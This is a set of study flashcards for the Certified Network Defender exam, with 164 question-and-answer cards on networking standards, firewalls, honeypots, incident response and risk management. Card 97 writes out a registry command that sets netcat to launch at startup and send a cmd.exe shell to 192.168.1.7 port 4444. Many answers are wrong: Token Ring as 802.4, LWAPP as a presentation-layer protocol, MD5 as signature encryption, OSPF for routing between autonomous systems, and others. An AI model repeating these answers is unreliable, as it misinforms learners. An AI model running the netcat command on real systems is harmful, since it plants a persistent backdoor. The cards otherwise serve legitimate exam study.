Study CND Flashcards

1
Q

What is the bit size of the Next Header field in the IPv6 header format?

A

8 Bits

2
Q
Which of the following is a presentation layer protocol?
A. TCP
B. RPC
C. BGP
D. LWAPP
A

Answer: D

LWAPP

3
Q

What IEEE standard is Fast Basic Service Set Transition? And what does it do?

A

802.11r is the standard to permit continuous connectivity aboard wireless devices in motion, with fast and secure handoffs from one base station to another, managed in a seamless manner.

4
Q

__________ is a congestion control mechanism that is designed for unicast flows operating in an Internet environment and competing with TCP traffic.

A

TCP Friendly Rate Control

5
Q

What is the IEEE-SA for wireless personal area networks?

A

802.15

6
Q

Which layer performs routing of IP datagrams?

A

Internet Layer

7
Q
Which of the following layers performs routing of IP datagrams?
A. Transport layer
B. Link layer
C. Application layer
D. Internet layer
A

Internet layer

Answer: D

8
Q
Which of the following standards defines Logical Link Control (LLC)?
A. 802.2
B. 802.3
C. 802.5
D. 802.4
A

802.2

Answer: A

9
Q
Which of the following protocols supports source-specific multicast (SSM)?
A. DHCP
B. ARP
C. DNS
D. BGMP
A

BGMP

Answer: D

10
Q
Token Ring is standardized by which of the following IEEE standards?
A. 802.2
B. 802.4
C. 802.3
D. 802.1
A

802.4 is the standard for Token Ring

Answer: B

11
Q
Which of the following is an example of a network providing DQDB access methods?
A. IEEE 802.3
B. IEEE 802.2
C. IEEE 802.4
D. IEEE 802.6
A

802.6 - Local and Metropolitan Area Networks: Distributed Queue Dual Bus (DQDB) Subnetwork of a Metropolitan Area Network (MAN)

Answer: D

12
Q
Which of the following IEEE standards defines the demand priority access method?
A. 802.15
B. 802.3
C. 802.12
D. 802.11
A

802.12

Answer: C

has to do with 100 Mbit Wifi on demand access. Probably not on the test. MAN

13
Q
Which of the following IEEE standards adds QoS features and multimedia support?
A. 802.11b
B. 802.11e
C. 802.5
D. 802.11a
A

802.11e

Answer: B

14
Q

Which of the following OSI layers is sometimes called the syntax layer?

A

Presentation layer

15
Q
Which of the following IEEE standards defines the token passing ring topology?
A. 802.4
B. 802.5
C. 802.3
D. 802.7
A

802.5

Answer: B

16
Q
Which of the following IEEE standards defines a physical bus topology?
A. 802.4
B. 802.5
C. 802.6
D. 802.3
A

802.4

Answer: A

17
Q
Which of the following fields in the IPv6 header replaces the TTL field in the IPv4 header?
A. Next header
B. Traffic class
C. Hop limit
D. Version
A

Hop Limit

Answer: C

18
Q
What is the response of an Xmas scan if a port is either open or filtered?
A. RST
B. No response
C. FIN
D. PUSH
A

No response

Answer: B

19
Q

CSMA/CD is specified in which IEEE standard?

A

802.3

20
Q

Which of the following protocols sends a jam signal when a collision is detected?

A

CSMA/CD

21
Q
Which of the following protocols is used in wireless networks?
A. CSMA
B. CSMA/CD
C. ALOHA
D. CSMA/CA
A

CSMA/CA

Answer: D

22
Q

TCP SYN scanning is also known as

A

half-open scanning

23
Q

You are a professional Computer Hacking forensic investigator. You have been called to collect evidence of buffer overflow and cookie snooping attacks. Which of the following logs will you review to accomplish the task?
A. Program logs
B. Web server logs
C. Event logs
D. System logs

A

A. Program logs

C. Event logs
D. System logs

Answer: D, C, and A

24
Q

Jason diagnoses the internals of his computer and observes that some changes have been made in Sam’s computer registry. To rectify the issue, Jason has to restore the registry. Which of the following utilities can Jason use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply.
A. Reg.exe
B. EventCombMT
C. Regedit.exe
D. Resplendent registrar

A

A. Reg.exe

C. Regedit.exe
D. Resplendent registrar

25
Q

The Distance Vector Multicast Routing Protocol (DVMRP) is used to …

A

share information between routers to transport IP Multicast packets among networks.

26
Q

______________ is an enumeration technique used to glean information about computer systems on a network and the services running on its open ports.

A

Banner Grabbing

27
Q

The Data Link Switching Client Access Protocol (DCAP) is an application layer protocol that is used between workstations and routers for

A

transporting SNA/NetBIOS traffic over TCP sessions.

28
Q

Honeynet is a prime example of

A

a high-interaction honeypot.

29
Q

Two or more honeypots on a network form a

A

honeynet.

30
Q

Which of the following steps of the OPSEC process examines each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then compare those indicators with the adversary’s intelligence collection capabilities identified in the previous action?
A. Analysis of Threats
B. Application of Appropriate OPSEC Measures
C. Identification of Critical Information
D. Analysis of Vulnerabilities
E. Assessment of Risk

A

D. Analysis of Vulnerabilities

Analysis of Vulnerabilities: It includes examining each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then comparing those indicators with the adversary’s intelligence collection capabilities identified in the previous action.

31
Q
Which of the following protocols is used for inter-domain multicast routing and natively supports "source-specific multicast" (SSM)?
A. BGMP
B. DVMRP
C. OSPF
D. EIGRP
A

BGMP

BGMP stands for border gateway multicast protocol. It is used for inter-domain multicast routing and natively supports “source-specific multicast” (SSM). In order to support “any-source multicast” (ASM), BGMP builds shared trees for active multicast groups. This allows domains to build source-specific, inter-domain, distribution branches where needed. BGMP uses TCP as its transport protocol, which helps in eliminating the need to implement message fragmentation, retransmission, acknowledgement, and sequencing.

32
Q

What did the 802.11e enhancement to 802.11a and 802.11b provide?

A

QoS prioritization of voice, data, and video transmissions

33
Q

Which of the OSI seven layers establishes, manages, and terminates connections between local and remote applications?

A

Session

34
Q

Which of the following are used as a cost estimating technique during the project planning stage? Each correct answer represents a complete solution. Choose three.
A. Function point analysis
B. Program Evaluation Review Technique (PERT)
C. Expert judgment
D. Delphi technique

A

D. Delphi technique
C. Expert judgment
A. Function point analysis

35
Q

Which of the following IP class addresses are not allotted to hosts?

A

Class D (224-239): reserved for multicasting

Class E (240-255): experimental

36
Q

Which of the following IEEE standards provides specifications for wireless ATM systems?

A

802.11a

37
Q

Which of the following is the type of documented business rule for protecting information and the systems which store and process the information?
A. Information protection policy
B. Information protection document
C. Information storage policy
D. Information security policy

A

Information security policy

38
Q
Which of the following UTP cables supports transmission up to 20MHz?
A. Category 2
B. Category 5e
C. Category 4
D. Category 1
A

Category 4

39
Q
Which of the following is also known as slag code?
A. Trojan
B. Logic bomb
C. Worm
D. IRC bot
A

Logic Bomb

40
Q
Which of the following is susceptible to a birthday attack?
A. Authentication
B. Integrity
C. Authorization
D. Digital signature
A

Digital Signature

41
Q
Which of the following wireless networks provides connectivity over distance up to 20 feet?
A. WMAN
B. WPAN
C. WLAN
D. WWAN
A

WPAN

42
Q
Which of the following networks interconnects devices centered on an individual person's workspace?
A. WLAN
B. WPAN
C. WWAN
D. WMAN
A

WPAN

43
Q
Which of the following is a symmetric 64-bit block cipher that can support key lengths up to 448 bits?
A. HAVAL
B. BLOWFISH
C. IDEA
D. XOR
A

Blowfish

44
Q
Which of the following protocols is used to exchange encrypted EDI messages via email?
A. S/MIME
B. MIME
C. HTTP
D. HTTPS
A

S/MIME

45
Q
Which of the following are provided by digital signatures?
A. Identification and validation
B. Authentication and identification
C. Integrity and validation
D. Security and integrity
A

Authentication and Validation

46
Q
Which of the following is a passive attack?
A. Unauthorized access
B. Traffic analysis
C. Replay attack
D. Session hijacking
A

Traffic Analysis

Answer: B

47
Q
Which of the following is a malicious program that looks like a normal program?
A. Impersonation
B. Worm
C. Virus
D. Trojan horse
A

Trojan Horse

48
Q
Which of the following is an IPSec protocol that can be used alone or in combination with Authentication Header (AH)?
A. L2TP
B. PPTP
C. ESP
D. PPP
A

ESP

Encapsulating Security Payload protocol

49
Q
Which of the following attacks combines dictionary and brute force attacks?
A. Replay attack
B. Man-in-the-middle attack
C. Hybrid attack
D. Phishing attack
A

Hybrid Attack

50
Q
Which of the following attacks comes under the category of an active attack?
A. Replay attack
B. Wireless footprinting
C. Passive Eavesdropping
D. Traffic analysis
A

Replay Attack

51
Q
Which of the following encryption techniques do digital signatures use?
A. MD5
B. RSA
C. Blowfish
D. IDEA
A

MD5

52
Q
Which of the following header fields in TCP/IP protocols involves Ping of Death attack?
A. SMTP header field
B. TCP header field
C. IP header field
D. UDP header field
A

TCP Header Field

53
Q
Which of the following modems offers wireless communication under water?
A. Controllerless modem
B. Short haul modem
C. Acoustic modem
D. Optical modem
A

Acoustic modem

54
Q

Which of the following protocols is used by the Remote Authentication Dial In User Service (RADIUS) client/server protocol for data transmission?
A. DCCP
B. FTP
C. FCP
D. UDP

A

UDP

55
Q
Which of the following applications is used for the statistical analysis and reporting of the log files?
A. Sawmill
B. Sniffer
C. Snort
D. jplag
A

Sawmill

56
Q
Which of the following is a Cisco product that performs VPN and firewall functions?
A. Circuit-Level Gateway
B. PIX Firewall
C. IP Packet Filtering Firewall
D. Application Level Firewall
A

PIX Firewall

57
Q
Which of the following is also known as stateful firewall?
A. PIX firewall
B. Stateless firewall
C. DMZ
D. Dynamic packet-filtering firewall
A

Dynamic packet-filtering firewall

58
Q
Which of the following is a centralized collection of honeypots and analysis tools?
A. Production honeypot
B. Honeynet
C. Research honeypot
D. Honeyfarm
A

Honeyfarm

59
Q
Which of the following routing metrics is the sum of the costs associated with each link traversed?
A. Routing delay
B. Communication cost
C. Bandwidth
D. Path length
A

Path Length

60
Q
Which of the following honeypots is a useful little burglar alarm?
A. Backofficer friendly
B. Specter
C. Honeynet
D. Honeyd
A

Backofficer friendly

61
Q
What is the location of honeypot on a network?
A. Honeyfarm
B. Honeynet
C. Hub
D. DMZ
A

DMZ

62
Q
Which of the following is an open source implementation of the syslog protocol for Unix?
A. syslog-os
B. syslog Unix
C. syslog-ng
D. Unix-syslog
A

syslog-ng

63
Q
Which of the following protocols is a more secure version of the Point-to-Point Tunneling Protocol (PPTP) and provides tunneling, address assignment, and authentication?
A. IP
B. L2TP
C. PPP
D. DHCP
A

L2TP

64
Q
Which of the following sets of incident response practices is recommended by the CERT/CC?
A. Prepare, notify, and follow up
B. Notify, handle, and follow up
C. Prepare, handle, and notify
D. Prepare, handle, and follow up
A

Prepare, handle, and follow up

65
Q
Which of the following tools scans the network systems for well-known and often exploited vulnerabilities?
A. Nessus
B. SAINT
C. SATAN
D. HPing
A

SATAN

66
Q
Which of the following tools examines a system for a number of known weaknesses and alerts the administrator?
A. Nessus
B. COPS
C. SATAN
D. SAINT
A

COPS

67
Q

Which of the following is the full form of SAINT?
A. System Automated Integrated Network Tool
B. Security Admin Integrated Network Tool
C. System Admin Integrated Network Tool
D. System Administrators Integrated Network Tool

A

System Administrators Integrated Network Tool

68
Q
Which of the following is a type of VPN that involves a single VPN gateway?
A. Remote-access VPN
B. Extranet-based VPN
C. PPTP VPN
D. Intranet-based VPN
A

Extranet-based VPN

69
Q
Which of the following is a free security-auditing tool for Linux?
A. SAINT
B. SATAN
C. Nessus
D. HPing
A

Nessus

70
Q
Which of the following types of RAID is also known as disk striping?
A. RAID 0
B. RAID 2
C. RAID 1
D. RAID 3
A

RAID 0

71
Q
Which of the following is a process of transformation where the old system can no longer be maintained?
A. Disaster
B. Risk
C. Threat
D. Crisis
A

Crisis

72
Q
Which of the following phases is the first step towards creating a business continuity plan?
A. Business Impact Assessment
B. Scope and Plan Initiation
C. Business Continuity Plan Development
D. Plan Approval and Implementation
A

Scope and Plan Initiation

73
Q
Which of the following types of RAID offers no protection for the parity disk?
A. RAID 2
B. RAID 1
C. RAID 5
D. RAID 3
A

RAID 3

74
Q
Which of the following processes helps the business units to understand the impact of a disruptive event?
A. Plan approval and implementation
B. Business continuity plan development
C. Scope and plan initiation
D. Business impact assessment
A

Business impact assessment

75
Q
Which of the following is a network analysis tool that sends packets with nontraditional IP stack parameters?
A. Nessus
B. COPS
C. SAINT
D. HPing
A

HPING

76
Q
Which of the following protocols is a method of implementing virtual private networks?
A. OSPF
B. PPTP
C. IRDP
D. DHCP
A

PPTP

77
Q

Which of the following attacks are computer threats that try to exploit computer application vulnerabilities that are unknown to others or undisclosed to the software developer? Each correct answer represents a complete solution. Choose all that apply.
A. Buffer overflow
B. Zero-day
C. Spoofing
D. Zero-hour

A

Zero Day and Zero Hour

78
Q

Which of the following is a service discovery protocol that allows computers and other devices to find services in a local area network without prior configuration?
A. NTP
B. SLP
C. NNTP
D. DCAP

A

SLP

Service Location Protocol

79
Q

In L2TP ______________ tunnel mode, the ISP must support L2TP, whereas in L2TP tunnel mode, the ISP does not need to support L2TP.

A

compulsory

80
Q
Which of the following tools examines a system for a number of known weaknesses and alerts the administrator?
SAINT
Nessus
SATAN
COPS
A

Should have chosen

COPS

81
Q

Which of the following routing metrics refers to the length of time that is required to move a packet from source to destination through the internetwork?

Bandwidth
Path length
Routing Delay
Load

A

Routing Delay

82
Q

Your company is outgrowing its current facility and plans to relocate within the next year. You need to provide management with guidance on selecting an appropriate new location. You are compiling a list of location considerations. Which is NOT a consideration?

proximity to roads
neighboring buildings
emergency exits
utility systems

A

emergency exits

83
Q

You are designing the site-to-site VPN topology. You want to connect all branches to the main office while preventing direct connections between branch offices. Which topology should you choose?

hub and spoke
star
mesh
ring

A

star

84
Q

You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company’s network. Which type of Internet access policy is currently implemented?

Paranoid
Prudent
Permissive
Promiscuous

A

Promiscuous

85
Q

Recently, an attacker was able to connect to a wireless access point as a client and eavesdrop on the traffic to obtain address information. Which type of wireless attack has occurred?

ad-hoc connection attack
AP MAC spoofing
misconfigured access point attack
evil twin attack

A

AP MAC spoofing

86
Q

In the process of evaluating the QoS features of VPN products, you become concerned with the ratio of data packets sent versus all packets. What is this called?

packet loss
Delay
Jitter
Goodput

A

Goodput

87
Q
You are using Nmap to perform a vulnerability assessment. Which of the following procedures would help to create a map of the network?	
ping sweep
Service discovery
port scan
OS fingerprinting
A

ping sweep

88
Q

Which of the following third party encryption tools can perform on the fly encryption (OTFE)?

Open Puff
AxCrypt
Wireshark
Veracrypt

A

Veracrypt

89
Q

You would like to connect your sniffer to a switch and capture all traffic going through the switch. Which of the following features could you use?

VTP
802.1q
DAI
RAP
STP
SPAN
A

RAP

SPAN

90
Q

During which stage of the IH&R process is a vulnerability analysis performed?

Eradication and Recovery
Post-Incident Activities
Forensic Investigation
Containment

A

Eradication and Recovery

91
Q

With which of the following flag sets does the Xmas tree scan send a TCP frame to a remote device?

RST
PUSH
FIN
URG

A

PUSH
FIN
URG

92
Q

Which of the following is the logical entity that enables programming code or software to operate in a virtualization solution?

virtual machine
hypervisor
execution environment
host operating system

A

execution environment

93
Q

What is the second phase in the vulnerability management process?

Remediation
Asset prioritization
Verification
Assessment

A

Asset prioritization

94
Q

Which of the following are the responsibilities of the disaster recovery team?

Each correct answer represents a complete solution. Choose all that apply.

To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts

To initiate the execution of the disaster recovery procedures

To monitor the execution of the disaster recovery plan and assess the results

To notify management, affected personnel, and third parties about the disaster

A

To modify and update the disaster recovery plan according to the lessons learned from previous disaster recovery efforts

To initiate the execution of the disaster recovery procedures

To monitor the execution of the disaster recovery plan and assess the results

To notify management, affected personnel, and third parties about the disaster

95
Q

You are deploying a network IDS, and your main concern is to monitor surges in traffic that may indicate a DoS attack. Where should you place the sensors?

in the DMZ
on major backbones
on critical subnets
behind the external firewall

A

on major backbones

96
Q

Which wireless IPS will raise its risk indicator to 100% if an AP were discovered to be running with no encryption?

A

AirMobile Server

97
Q

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe”

What task do you want to perform by running this command?

You want to put Netcat in the stealth mode.
You want to set the Netcat to execute command any time.
You want to perform banner grabbing.
You want to add the Netcat command to the Windows registry.

A

You want to put Netcat in the stealth mode.
You want to set the Netcat to execute command any time.
You want to add the Netcat command to the Windows registry.

98
Q

Management is concerned that your Linux email server can become the victim of a DoS attack. Which of the following hardening recommendations will help reduce this possibility?

Use DNSBL servers.
Activate SPF.
Configure reverse DNS lookup.
Limit the number of connections.

A

Limit the number of connections.

99
Q

Management is concerned that an attacker will be able to access the /etc/shadow password file on a Linux server. When the Linux server was installed, the default permissions for this file were used. For this reason, you are not concerned.

What are the default permissions for this file?

500
400
600
700

A

400

100
Q

You may need to know how to change permissions in numeric code in Linux, so to do this you use numbers instead of “r”, “w”, or “x”.

What are the eight permission combinations of Owner, Group, User?

0 = No Permission
1 = Execute
2 = Write
4 = Read
A

Permission numbers are:

0 = ---
1 = --x
2 = -w-
3 = -wx
4 = r--
5 = r-x
6 = rw-
7 = rwx

example
chmod 744

101
Q

Which of the following protocols is used for exchanging routing information between two gateways in a network of autonomous systems?

IGMP
EGP
OSPF
ICMP

A

OSPF

102
Q

Which of the following functions becomes possible when using quantitative risk analysis?

risk elimination
cost/benefit analysis
risk prioritization
risk identification

A

Cost/Benefit analysis

103
Q

Which of the following standards does a cloud service provider have to comply with, to protect the privacy of its customer’s personal information?

ISO/IEC 27020
ISO/IEC 27021
ISO/IEC 27018
ISO/IEC 27019

A

ISO/IEC 27018

104
Q

Which group in ISO/IEC 27001 includes communications security controls?

A.6

A.15

A.5

A.13

A

A.13

105
Q

Which wireless discovery tool uses the Windows command netsh wlan show networks mode=bssid to get wireless information?

NetStumbler
Vistumbler
InSSIDer
NetSurveyor

A

Vistumbler

106
Q

Business Continuity Plan

A

provides measures for sustaining essential business operations while recovering from significant disruption

107
Q

Business Recovery Plan

A

provides measures for recovering business operations immediately following a disaster

108
Q

Continuity of Operation plan

A

provides measures and capabilities to maintain organizational essential, strategic functions at an alternate site for up to 30 days

109
Q

It provides measures and capabilities for recovering a major application or general support system.

A

Contingency Plan

110
Q

It provides measures for disseminating status report to personnel and the public

A

Crisis Communication Plan

111
Q

It provides detailed measures to facilitate recovery of capabilities at an alternate site.

A

Disaster recovery plan

112
Q

What are the three layers of computer network defense (CND)?

people, assets, and technology
assets, operations, and technology
people, operations, and technology
people, operations, and assets

A

people, operations, and technology

113
Q

In which phase of the NIST Risk Management framework are security controls tailored to the needs of the organization?

Authorize
Select
Categorize
Monitor

A

Select

114
Q

Which of the following is a maintenance protocol that permits routers and host computers to swap basic control information when data is sent from one computer to another?

BGP
ICMP
SNMP
IGMP

A

ICMP

115
Q

You are assessing security needs for several hosts according to their purpose in the network. Which of the following factors would NOT affect security considerations for the hosts?

network services provided by the host
category of information stored on the host
operating system of the host
security requirements needed for information

A

operating system of the host

116
Q

Which sniffing tool is a command-line tool?

Dsniff
Capsa
Tcpdump
ColaSoft

A

tcpdump

117
Q

Sally needs to encrypt a document so that only Bob can decrypt it. What key should she use for this?

Bob’s public key
Sally’s public key
Sally’s private key
Bob’s private key

A

Bob’s Public Key

118
Q

Which of the following is true of security policies and baselines?

Security policies define the structure of the baseline.
Baselines define the structure of the security policy.
Policies are specific to the operating system.
Baselines are not specific to the operating system.

A

Baselines define the structure of the security policy

119
Q

Which of the following is NOT an IDS system?

Peek and Spy
Snort
Vanguard Enforcer
KFSensor

A

KFSensor (Windows IPS)

120
Q

Identify the firewall technology that monitors the TCP handshake between the packets to determine whether a requested session is legitimate.

Packet Filtering Firewall
Circuit Level Gateway
Stateful Multilayer Inspection
Network Address Translation

A

Circuit Level Gateway

121
Q

During IH&R, the ____________ and containment processes can run at the same time.

Solution:

forensic analysis or forensic investigation

Determine whether the given solution is correct?

Correct
OR ?
Incorrect

A

correct

122
Q

During which phase of the vulnerability management process are rogue devices typically discovered?

Asset Prioritization
Discovery
Reporting
Assessment

A

Discovery

123
Q

Which of the following does NOT occur during the Post-incident Activity stage of IH&R?

Perform a damage assessment and document incident costs.
Update the incident handling policy.
Return the affected system to normal operation.

A

Return the affected system to normal operation.

124
Q

In which of the following levels of vulnerability management does scanning occur?

Assessment
Discovery
Asset prioritization
Remediation

A

Assessment

125
Q

At what layer of the OSI model do packet-filtering firewalls operate?

Layers 2 and 3
Layers 4 and 5
Layers 5 and 6
Layers 3 and 4

A

Layers 3 and 4

126
Q

Which of the following is a standard-based protocol that provides the highest level of VPN security?

PPP
IPSec
L2TP
IP

A

IPSec

127
Q

Which of the following forensic investigation roles examines the evidence acquired and determines what is useful to the investigation?

incident analyser
expert witness
evidence manager
evidence investigator

A

evidence investigator

128
Q

Which of the following should the first responder document prior to escalating an incident?

handling procedures
data about the affected system
containment actions
IRT contact information

A

data about the affected system

129
Q

Your sniffer just detected one device sending another a packet with the SYN flag set in the TCP header. What flags would you expect to be set in the packet the receiving device sends back to the sender?

SYN
ACK
SYN and ACK
RST

A

SYN and ACK

130
Q

Which tool ensures integrity of system files through the use of a cron job?

Trustwave
Tripwire
Code Green Networks TrueDLP
McAfee Total Protection for Data Loss

A

Tripwire

131
Q

Which policy defines the data sensitivity labels and the guidelines for processing, storing, and transmitting sensitive data?

acceptable use policy
network connection policy
information protection policy
information system security policy

A

information protection policy

132
Q

Which of the following firewalls are used to track the state of active connections and determine the network packets allowed to enter through the firewall?

Each correct answer represents a complete solution. Choose all that apply.

Dynamic packet-filtering
Stateful
Proxy server
Circuit-level gateway

A

Dynamic packet-filtering and Stateful

133
Q

The Tripwire tool is used for what function?

file integrity verification
intrusion detection
data loss prevention
log collection

A

file integrity verification

134
Q

Which phase of vulnerability management deals with the actions for patching the discovered vulnerabilities?

Verification
Mitigation
Remediation
Assessment

A

Remediation

135
Q

Which of the following is a mandatory password-based and key-exchange authentication protocol?

DH-CHAP
PPP
CHAP
VRRP

A

DH-CHAP

136
Q

You use the following filter in Wireshark:

(tcp.flags==0x02) && (tcp.window_size <1025)

What type of traffic is the filter trying to locate?

TCP ACK scans
TCP SYN scans
OS fingerprinting
TCP SYN ACK packets

A

OS fingerprinting

137
Q

Which of the following IDS tools performs packet filtering using Berkeley Packet Filtering commands?

AIDE
SNARE
Vanguard Enforcer
Snort

A

Snort

138
Q

Your company recently implemented an internal public key infrastructure (PKI). Because you need to ensure that all of the PKI components are secure, you are currently researching the vulnerabilities of the entity that signs the certificates.

Which entity are you examining?

a principal
a verifier
an issuer
a subject

A

an issuer

139
Q

Which of the following is NOT a suspicious TCP packet?

one with only the SYN flag set and data
one with the SYN and FIN flags set
one with the destination port of zero
one with only the SYN flag set and no data

A

one with only the SYN flag set and no data

140
Q

Which of the following tools is used to ping a given range of IP addresses and resolve the host name of the remote system?

Nmap
SuperScan
Netscan
Hping

A

SuperScan

141
Q

Your company decides to implement a new wireless network for employees who use mobile devices. You have been asked to determine which wireless deployment will provide the fastest throughput. Which of the following should you recommend?

802.11g
802.11ac
802.11n
802.11ad

A

802.11ad

142
Q

Which Wi-Fi discovery tool is built specifically for the Apple Mac OS?

Aircheck Wi-Fi tester
Xirrus Wi-Fi Inspector
AirRadar 2
Wellenreiter

A

AirRadar 2

143
Q

Your company implements an authentication mechanism on their website whereby customers need to enter the hidden letters in a distorted image to confirm their identity. Which type of knowledge factor authentication is being used?

PIN
challenge response
Passphrase
security question

A

Challenge Response

144
Q

What is the third step in the patch management process?

Assess
Deploy
Detect
Acquire

A

Acquire

145
Q

Which of the following can only be done with an asymmetric algorithm?

data integrity
digital signature
generate hash values
data encryption

A

digital signature

146
Q

Which of the following statements are NOT true about the FAT16 file system?

Each correct answer represents a complete solution. Choose all that apply.

It does not support file-level security.
It supports file-level compression.
It works well with large disks because the cluster size increases as the disk partition size increases.
It supports the Linux operating system.

A

It supports file-level compression.

It works well with large disks because the cluster size increases as the disk partition size increases.

147
Q

During which stage of the IH&R process is a vulnerability analysis performed?

Post-Incident Activities
Eradication and Recovery
Forensic Investigation
Containment

A

Eradication and Recovery

148
Q

Which of the following protocols is used to share information between routers to transport IP Multicast packets among networks?

LWAPP
DVMRP
RSVP
RPC

A

DVMRP

Distance Vector Multicast Routing Protocol

149
Q

Which of the following is true of content-based signatures?

Signatures are in packet payloads.
Signatures are in packet headers.
Packet analysis is enough to detect signatures.
Multiple packet analysis is required.

A

Signatures are in packet payloads.

150
Q

Which computer network defense (CND) approach examines the root cause or reasons for network attacks?

detective approach
retrospective approach
preventive approach
reactive approach

A

retrospective approach

151
Q

Which of the following is a Unix and Windows tool capable of intercepting traffic on a network segment and capturing username and password?

Aircrack
Ettercap
BackTrack
AirSnort

A

Ettercap

152
Q

You are reviewing your company’s application development policies. Which of the following should NOT be part of this?

Use standard application configuration baselines during development.
Implement secure coding review.
Ensure only authorized personnel can install software on all hosts.
Use standard secure coding practices and principles during development.

A

Use standard application configuration baselines during development.

153
Q

You need to test the strength of the WPA PSK password used in your WLAN. Which tool could you use for this?

Net Surveyor
NetStumbler
Vistumbler
Wireless Security Auditor

A

Wireless Security Auditor

154
Q

You have been hired to help a company increase its network defense. You discover that there are currently no restrictions on Internet or remote access usage on the company’s network. Which type of Internet access policy is currently implemented?

Permissive
Promiscuous
Paranoid
Prudent

A

Promiscuous

155
Q

Which of the following protocols uses a control channel over TCP and a GRE tunnel operating to encapsulate PPP packets?

PPTP
SSTP
ESP
LWAPP

A

PPTP

156
Q

Which of the following does NOT affect the severity of an incident?

service criticality
incident impact
incident duration
information confidentiality

A

information confidentiality

157
Q

Which of the following sniffers can operate on multi-network cards, such as ISDN and ADSL?

Dsniff
Capsa
ColaSoft Packet Sniffer
Colasoft Network Sniffer

A

ColaSoft Packet Sniffer

158
Q

In which of the following transmission modes is communication uni-directional?

Full-duplex mode
Half-duplex mode
Root mode
Simplex mode

A

Simplex Mode

159
Q

You suspect an attacker recently performed a UDP scan of the network. You would like to look for traffic that would verify this. How should you set the filter in Wireshark?

icmp.type==3 and icmp.code==3
tcp.flags==0x003
udp.dstport==7
icmp.type==8

A

icmp.type==3 and icmp.code==3

160
Q

Which of the following is a network interconnectivity device that translates different communication protocols and is used to connect dissimilar network technologies?

Switch
Gateway
Bridge
Router

A

Gateway

161
Q

Which of the following is the primary international body for fostering cooperative standards for telecommunications equipment and systems?

IEEE
CCITT
ICANN
NIST

A

CCITT

162
Q

At which level of virtualization does SAN technology operate?

file system
storage device
Fabric
server

A

Fabric

163
Q

Which of the following recovery plans includes specific strategies and actions to deal with specific variances to assumptions resulting in a particular security problem, emergency, or state of affairs?

Contingency plan
Continuity of Operations Plan
Business continuity plan
Disaster recovery plan

A

Contingency plan

164
Q

In which of the risk management phases is the context in which the risk exists determined?

Risk treatment
Risk assessment
Risk monitoring and review
Risk identification

A

Risk Identification